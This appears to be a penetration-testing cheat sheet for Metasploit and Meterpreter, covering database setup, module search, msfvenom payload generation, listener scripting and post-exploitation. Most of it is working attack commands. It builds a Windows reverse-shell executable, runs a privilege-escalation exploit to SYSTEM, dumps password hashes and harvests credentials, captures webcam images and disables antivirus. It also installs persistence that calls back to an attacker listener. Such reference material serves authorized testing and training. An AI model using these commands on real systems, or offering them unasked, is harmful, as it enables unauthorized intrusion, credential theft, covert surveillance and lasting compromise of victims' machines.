Metasploit framework
Start a Metasploit with the following script file:
$msfconsole -r test.rcTo run Metasploit, use the following command:
$msfconsoleUsing the database
In Kali Linux, you will need to start up the postgresql server before using the database:
$ systemctl start postgresqlAfter starting postgresql, you will need to create and initialize the msf database with msfdb init:
$ msfdb initIf you just created a new exploit and want to refresh metasploit db to start using the newly created exploit, enter the following:
$service postgresql restart && msfdb reinitThen, type the following command:
$msfconsole -qThe -q will start msfconsole in debug mode, so if you made mistakes in your new exploit class, the debugger will then print it to the screen.
More database-related commands
msf > db_status: This will confirm that Metasploit is successfully connected to the databasemsf > workspace: This will display the currently selected workspacesmsf > workspace [new workspace]: This changes the current workspace to the new one selectedmsf > workspace -a [the name of the workspace to add]: This is the name of the workspace to addmsf > workspace -d [the name of the workspace to delete]: This is the name of the workspace to deletemsf > db_import [XML folder path]: This will import a file from an earlier scan, for example,db_import /root/msfu/nmapScanmsf > db_nmap [nmap arguments]: This will scan using Nmap, for example,db_nmap -A 172.16.194.134msf > hosts: This will list the hosts after a scanmsf > services: This will list the services found after a scanmsf > creds: This will list any found credentials after a brute-force scanmsf > loot: This will retrieve hash dumps if you have already compromised a systemmsf > db_export -f [format] [xml file path]: For example,-db_export -f xml /root/msfu/Exported.xml
Getting around
msf > search: This will locate a specific module according to the search criteria that you provide (try to executehelp search)msf > search [any keyword]: For example,search apache version 2.3msf > grep & search: For example,grep http search apache- Search keywords:
app: Modules that are client or server attacksauthor: Modules written by this authorbid: Modules with a matching Bugtraq IDcve: Modules with a matching CVE IDedb: Modules with a matching Exploit-DB IDname: Modules with a matching descriptive nameplatform: Modules affecting this platformref: Modules with a matchingreftype: Modules of a specific type (exploit, auxiliary, or post)
- Examples:
msf > search cve:2009 type:exploit app:clientmsf > search name:mysqlmsf > search platform:windowsmsf > search type:auxiliary
- More commands:
msf > help: List the available commandsmsf > back: Go back one stepmsf > exit: Exit msfconsole
Using modules
msf > use [module name]: Select a module to use it. For example, usedos/windows/smb/ms09_001_write.msf > show: This will show info about a specific item in Metasploit.msf > show: Enteringshowat themsfconsoleprompt will display every module within Metasploit.msf > show options: This will show the module options.msf > show auxiliary: This will display a list of all of the available auxiliary modules within Metasploit.msf > show exploits: This will get a listing of all exploits contained in the framework.msf > show payloads: This will display all of the different payloads (either within Metasploit or in the same module).msf > show targets: This will display which targets are supported within the context of an exploit module.msf > show advanced: This will show you more advanced options if you wish to further fine-tune an exploit.msf > show encoders: This will display a list of the encoders that are available within msfconsole.msf > show nops: This will display the NOP generators that Metasploit has to offer.msf > info [module name]: This will provide you with detailed information about a module. For example,info exploit/windows/http/apache_chunked.msf > check: This will verify whether the target is vulnerable, but you will need to set the options first.msf > set: Thesetcommand allows you to configure the framework options and parameters for the current module you are working with. For example,set RHOST 172.16.194.134.msf > setg: This will set global variables withinmsfconsole. For example,setg LHOST 10.0.0.100.msf > unset: Theunsetcommand removes a parameter that has been previously configured withset. You can remove all assigned variables withunset all. For example,unset THREADS.msf > save: Thesavecommand will save your current environment and settings.msf > jobs [option]: Thejobscommand provides the ability to list and terminate these jobs. Use thejobs -hcommand to get the available options. For example,jobs -l.
Miscellaneous
msf > load [plugin name]: Theloadcommand loads a plugin from Metasploit's plugin directory. Arguments are passed askey=valon the shell. For example,load pcap_log.msf > unload [plugin name]: Theunloadcommand unloads a previously loaded plugin and removes any extended commands. For example,unload pcap_log.msf > loadpath [module path]: Theloadpathcommand will load a third-party module tree for the path so you can point Metasploit at your 0-day exploits, encoders, payloads, and so on. For example,loadpath exploit/windows/test/test_module.msf > connect [IP]: This is similar tonetcat. It is good for banner grabbing and interacting with the service. For example,connect 192.168.1.10.
msfvenom
msfvenom can be used, for example, to generate a reverse TCP Meterpreter payload for Windows OS:
$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 -b "\x00" -f exe -o Meterpreter.exe- Platforms: The following are the platform values that we can use:
Cisco or cisco, OSX or osx, Solaris or solaris, BSD or bsd, OpenBSD or openbsd, hardware, Firefox or firefox, BSDi or bsdi, NetBSD or netbsd, NodeJS or nodejs, FreeBSD or freebsd, Python or python, AIX or aix, JavaScript or javascript, HPUX or hpux, PHP or php, Irix or irix, Unix or unix, Linux or linux, Ruby or ruby, Java or java, Android or android, Netware or netware, Windows or windows, mainframe, multi.
- Executable formats: The following are the executable formats that we can use:
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war.
- Transform formats: The following are the transform formats that we can use:
bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript.
Listener scripting
$ touch script.rc
$ echo use exploit/multi/handler >> script.rc
$ echo set PAYLOAD windows/meterpreter/reverse_tcp >> script.rc
$ echo set LHOST 192.168.0.114 >> script.rc
$ echo set ExitOnSession false >> script.rc
$ echo exploit -j -z >> script.rc
$ msfconsole -r script.rcMeterpreter
msf > sessions [options or ID]: Thesessionscommand allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNCs, and so on (usesessions -hto get help).meterpreter > background: This will send the current Meterpreter session to the background and return you to themsfprompt.meterpreter > getuid: Displays to the user whether the Meterpreter server is running on the host.meterpreter > sysinfo: Displays the victim's OS info.meterpreter > cd: Changes the current directory on the compromised system.meterpreter > ls: Lists the current directory's contents.meterpreter > pwd: Prints the current directory on the compromised system.meterpreter > ps: Displays a list of running processes on the target.meterpreter > run post/windows/manage/migrate: Migrates to another process on the victim.meterpreter > use priv: Use this command before executing thegetsystemcommand.meterpreter > getsystem: Use this command to elevate your privileges.
If you get the error priv_elevate_getsystem: Operation failed: Access is denied, then follow these steps:
meterpreter > backgroundOption 1:
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
msf post(local_exploit_suggester) > runOption 2:
msf > use exploit/windows/local/: List of all Windows exploits.msf > use exploit/windows/local/ms10_015_kitrap0d: We've chosen one exploit from the list, as follows:
msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.100
msf exploit(ms10_015_kitrap0d) > set LPORT 4445
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM - Hooraymeterpreter > search: Provides a way of locating specific files on the target host. For example,search -f passwords*.txt.meterpreter > cat [file name path]: Displays the content of a file when it's given as an argument.meterpreter > download [file name path]: Downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. For example,download C:\\passwords.txt.meterpreter > upload [local file name] [remote path]: For example,upload evil_trojan.exe c:\\windows\\system32.meterpreter > execute [command]: Runs a command on the target systemmeterpreter > shell: Executes the shell (Terminal or DOS) on the target system.meterpreter > run post/windows/gather/hashdump: A post module that will dump the contents of the SAM database.meterpreter >ipconfig: Displays the network interfaces and addresses on the remote machine.meterpreter > webcam_list: Displays the currently available webcams on the target host.meterpreter > webcam_snap: Grabs a picture from a connected webcam on the target system and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename. For example,webcam_snap -i 1 -v false.meterpreter > python_import [local python file]: Imports a local Python file and executes it on the victim's machine. For example,meterpreter > python_import -f /root/readAutoLogonREG.py.meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24meterpreter > run post/windows/gather/checkvm: Checks to see if the compromised host is a virtual machine.meterpreter > run post/windows/gather/credentials/credential_collector: Harvests passwords hashes and tokens on the compromised host.meterpreter > run post/windows/gather/dumplinks: Thedumplinksmodule parses the.lnkfiles in a user's recent documents, which could be useful for further information gathering.meterpreter > run post/windows/gather/enum_applications: Enumerates the applications that are installed on the compromised host.meterpreter > run post/windows/gather/enum_logged_on_users: Returns a list of current and recently logged on users, along with their SIDs.meterpreter > run post/windows/gather/enum_shares: Returns a list of both configured and recently used shares on the compromised system.meterpreter > run post/windows/gather/enum_snmp: Enumerates the SNMP service configuration on the target, if present, including the community strings.meterpreter > run post/windows/gather/hashdump: Dumps the local users' accounts on the compromised host using the registry.meterpreter > run post/windows/gather/usb_history: Enumerates the USB drive history on the compromised system.meterpreter > run getcountermeasure: Checks the security configuration on the victims' system and can disable other security measures, such as A/V, the firewall, and much more.meterpreter > run getgui -e: Enables RDP on a target system if it is disabled.meterpreter > run gettelnet -e: Enables Telnet on the victim if it is disabled.meterpreter > run killav: Disables most antivirus programs running as a service on a target.meterpreter > run remotewinenum -u administrator -p password123 -t 10.0.0.100: Enumerates the system information throughwmicon the victim. Makes note of where the logs are stored.meterpreter > run scraper: Grabs the system information, including the entire registrymeterpreter > run winenum: This makes for a very detailed Windows enumeration tool. It dumps tokens, hashes, and much more.meterpreter > run persistence -U -i 10 -p 443 -r 192.168.1.5: Configures our persistent Meterpreter session to wait until a user logs on to the remote system and tries to connect back to our listener every 10 seconds at IP address192.168.1.5on port443.
